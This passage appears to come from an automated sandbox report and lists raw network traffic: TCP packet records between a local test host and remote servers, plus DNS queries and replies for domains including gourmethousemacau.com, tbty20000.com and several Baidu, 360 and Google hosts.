                                                                                                                                                              Mar 13, 2023 05:27:38.785933018 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.786022902 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.786129951 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.786201000 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.786212921 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.786336899 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.786411047 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.786487103 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.828305960 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.988250971 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988332033 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988394022 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988425970 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.988451004 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988526106 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.988595009 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988660097 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988728046 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.988765955 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988883972 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.988950968 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.988965034 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.989069939 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:38.989140034 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:38.989172935 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.047092915 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.191365004 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191448927 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191540003 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191562891 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.191596985 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191662073 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.191663980 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191735983 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191814899 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.191905022 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.191971064 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.192038059 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.192075014 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.192194939 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.192262888 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.250052929 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.346487999 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.394639969 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.394732952 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.394798040 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.394829035 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.394880056 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.394937992 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.394992113 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.395080090 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.395179033 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:39.395262003 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.395361900 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:39.395433903 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:40.430108070 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:40.430314064 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:40.430425882 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:27:43.033333063 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:27:43.033405066 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:43.033494949 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:27:43.033520937 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:27:43.776106119 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:43.780404091 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:43.787466049 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:43.900912046 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:43.984136105 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:43.992193937 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.103980064 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104048014 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104096889 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104115009 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.104145050 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104199886 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.104259014 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104305983 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104370117 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.104432106 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104583979 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104656935 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.104674101 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104760885 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104816914 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.104892015 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.104979038 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.105042934 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.126427889 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.132917881 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.216681957 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.306997061 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307060003 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307100058 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.307106018 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307166100 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.307182074 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307298899 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307358027 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.307439089 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307543039 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307598114 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.307671070 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307718039 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307796001 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.307868004 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.307986021 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.308043957 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:44.308119059 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:44.445502996 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Mar 13, 2023 05:26:03.788445950 CET6270453192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:03.795114040 CET4997753192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:03.795857906 CET5784053192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:03.814676046 CET53627048.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:03.821799040 CET53578408.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:04.573611021 CET53499778.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:05.596791029 CET6062553192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:05.621429920 CET53606258.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:06.301162958 CET5113953192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:06.329091072 CET53511398.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:06.347562075 CET5295553192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET53529558.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:07.612328053 CET5713453192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET53571348.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.467498064 CET5604253192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.469453096 CET5963653192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.471134901 CET5563853192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.473098040 CET5770453192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.511444092 CET6532053192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.513235092 CET6076753192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.528476954 CET6510753192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.529341936 CET5384853192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.538784027 CET53607678.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.546435118 CET5757153192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.550398111 CET53651078.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.552850008 CET5869153192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:08.560709953 CET53538488.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.579067945 CET53586918.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.710809946 CET53560428.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.712250948 CET53577048.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET53556388.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:08.848012924 CET53575718.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET53596368.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:09.145782948 CET53653208.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:26:42.548218966 CET5199253192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:26:42.581633091 CET53519928.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:05.050586939 CET5078453192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:27:05.895993948 CET53507848.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:06.414453983 CET6496753192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:27:06.433975935 CET53649678.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:07.728960037 CET4920153192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:27:07.831114054 CET6493653192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:27:08.008191109 CET53649368.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:08.310092926 CET53492018.8.8.8192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:30.565870047 CET5738753192.168.2.38.8.8.8
                                                                                                                                                              Mar 13, 2023 05:27:30.583606958 CET53573878.8.8.8192.168.2.3
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Mar 13, 2023 05:26:03.788445950 CET192.168.2.38.8.8.80xf7f9Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:03.795114040 CET192.168.2.38.8.8.80xa5e2Standard query (0)www.gourmethousemacau.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:03.795857906 CET192.168.2.38.8.8.80x92ebStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:05.596791029 CET192.168.2.38.8.8.80x87ceStandard query (0)www.tbty20000.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.301162958 CET192.168.2.38.8.8.80xe01cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.347562075 CET192.168.2.38.8.8.80xebeaStandard query (0)jspassport.ssl.qhimg.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:07.612328053 CET192.168.2.38.8.8.80x52ceStandard query (0)s.ssl.qhres2.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.467498064 CET192.168.2.38.8.8.80x1a6eStandard query (0)hm.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.469453096 CET192.168.2.38.8.8.80x1601Standard query (0)push.zhanzhang.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.471134901 CET192.168.2.38.8.8.80x93ddStandard query (0)api.share.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.473098040 CET192.168.2.38.8.8.80x48baStandard query (0)s.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.511444092 CET192.168.2.38.8.8.80x3d25Standard query (0)sp0.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.513235092 CET192.168.2.38.8.8.80xc1aaStandard query (0)www.ckjju.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.528476954 CET192.168.2.38.8.8.80x65dfStandard query (0)www.elevenkicks.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.529341936 CET192.168.2.38.8.8.80x9479Standard query (0)www.felchlin.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.546435118 CET192.168.2.38.8.8.80x494bStandard query (0)www.hkwp.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.552850008 CET192.168.2.38.8.8.80x30dfStandard query (0)www.uuecd.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:42.548218966 CET192.168.2.38.8.8.80xac73Standard query (0)www.metacafe.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:05.050586939 CET192.168.2.38.8.8.80xd7eeStandard query (0)www.gourmethousemacau.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:06.414453983 CET192.168.2.38.8.8.80xdb8fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:07.728960037 CET192.168.2.38.8.8.80x2477Standard query (0)jspassport.ssl.qhimg.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:07.831114054 CET192.168.2.38.8.8.80xdebfStandard query (0)www.tbty20000.comA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:30.565870047 CET192.168.2.38.8.8.80xe5eStandard query (0)www.hkwp.comA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Mar 13, 2023 05:25:52.500025988 CET8.8.8.8192.168.2.30x57e6No error (0)windowsupdatebg.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:25:52.795772076 CET8.8.8.8192.168.2.30x6b9dNo error (0)windowsupdatebg.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:03.814676046 CET8.8.8.8192.168.2.30xf7f9No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:03.814676046 CET8.8.8.8192.168.2.30xf7f9No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:03.821799040 CET8.8.8.8192.168.2.30x92ebNo error (0)accounts.google.com142.250.203.109A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:04.573611021 CET8.8.8.8192.168.2.30xa5e2No error (0)www.gourmethousemacau.com59.188.3.132A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:05.621429920 CET8.8.8.8192.168.2.30x87ceNo error (0)www.tbty20000.com23.251.32.116A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.329091072 CET8.8.8.8192.168.2.30xe01cNo error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET8.8.8.8192.168.2.30xebeaNo error (0)jspassport.ssl.qhimg.comjspassport.ssl.qhimg.com.qh-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET8.8.8.8192.168.2.30xebeaNo error (0)jspassport.ssl.qhimg.com.qh-cdn.comjspassport.ssl.qhimg.com.webcdn.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET8.8.8.8192.168.2.30xebeaNo error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.108.23A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET8.8.8.8192.168.2.30xebeaNo error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.108.22A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET8.8.8.8192.168.2.30xebeaNo error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.110.245A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:06.927141905 CET8.8.8.8192.168.2.30xebeaNo error (0)jspassport.ssl.qhimg.com.webcdn.360qhcdn.com104.192.108.192A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET8.8.8.8192.168.2.30x52ceNo error (0)s.ssl.qhres2.coms.ssl.qhres2.com.qh-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET8.8.8.8192.168.2.30x52ceNo error (0)s.ssl.qhres2.com.qh-cdn.comd22oj5itccz3aw.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET8.8.8.8192.168.2.30x52ceNo error (0)d22oj5itccz3aw.cloudfront.net65.9.25.112A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET8.8.8.8192.168.2.30x52ceNo error (0)d22oj5itccz3aw.cloudfront.net65.9.25.49A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET8.8.8.8192.168.2.30x52ceNo error (0)d22oj5itccz3aw.cloudfront.net65.9.25.2A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.193600893 CET8.8.8.8192.168.2.30x52ceNo error (0)d22oj5itccz3aw.cloudfront.net65.9.25.55A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.538784027 CET8.8.8.8192.168.2.30xc1aaNo error (0)www.ckjju.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.538784027 CET8.8.8.8192.168.2.30xc1aaNo error (0)www.ckjju.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.550398111 CET8.8.8.8192.168.2.30x65dfNo error (0)www.elevenkicks.comelevenkicks.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.550398111 CET8.8.8.8192.168.2.30x65dfNo error (0)elevenkicks.com198.55.28.26A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.560709953 CET8.8.8.8192.168.2.30x9479No error (0)www.felchlin.comfelchlin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.560709953 CET8.8.8.8192.168.2.30x9479No error (0)felchlin.com149.126.4.76A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.579067945 CET8.8.8.8192.168.2.30x30dfNo error (0)www.uuecd.com104.21.22.56A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.579067945 CET8.8.8.8192.168.2.30x30dfNo error (0)www.uuecd.com172.67.202.248A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.710809946 CET8.8.8.8192.168.2.30x1a6eNo error (0)hm.baidu.comhm.e.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.710809946 CET8.8.8.8192.168.2.30x1a6eNo error (0)hm.e.shifen.com103.235.46.191A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.712250948 CET8.8.8.8192.168.2.30x48baNo error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.712250948 CET8.8.8.8192.168.2.30x48baNo error (0)s.360.cn101.198.2.147A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.712250948 CET8.8.8.8192.168.2.30x48baNo error (0)s.360.cn180.163.251.231A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.712250948 CET8.8.8.8192.168.2.30x48baNo error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.baidu.comapi.share.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.n.shifen.com39.156.68.163A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.n.shifen.com112.34.113.148A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.n.shifen.com180.101.212.103A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.n.shifen.com182.61.201.93A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.n.shifen.com182.61.201.94A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.798902988 CET8.8.8.8192.168.2.30x93ddNo error (0)api.share.n.shifen.com182.61.240.101A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:08.848012924 CET8.8.8.8192.168.2.30x494bNo error (0)www.hkwp.com43.241.73.144A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)push.zhanzhang.baidu.comshare.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.jomodns.comshare.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.n.shifen.com39.156.68.163A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.n.shifen.com112.34.113.148A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.n.shifen.com180.101.212.103A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.n.shifen.com182.61.201.93A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.n.shifen.com182.61.201.94A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.103512049 CET8.8.8.8192.168.2.30x1601No error (0)share.n.shifen.com182.61.240.101A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.145782948 CET8.8.8.8192.168.2.30x3d25No error (0)sp0.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.145782948 CET8.8.8.8192.168.2.30x3d25No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.145782948 CET8.8.8.8192.168.2.30x3d25No error (0)www.wshifen.com104.193.88.123A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:09.145782948 CET8.8.8.8192.168.2.30x3d25No error (0)www.wshifen.com104.193.88.77A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:26:42.581633091 CET8.8.8.8192.168.2.30xac73Server failure (2)www.metacafe.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:05.895993948 CET8.8.8.8192.168.2.30xd7eeNo error (0)www.gourmethousemacau.com59.188.3.132A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:06.433975935 CET8.8.8.8192.168.2.30xdb8fNo error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                                                                                                              Mar 13, 2023 05:27:08.008191109 CET8.8.8.8192.168.2.30xdebfNo error (0)www.tbty20000.com23.251.32.116A (IP address)IN (0x0001)false
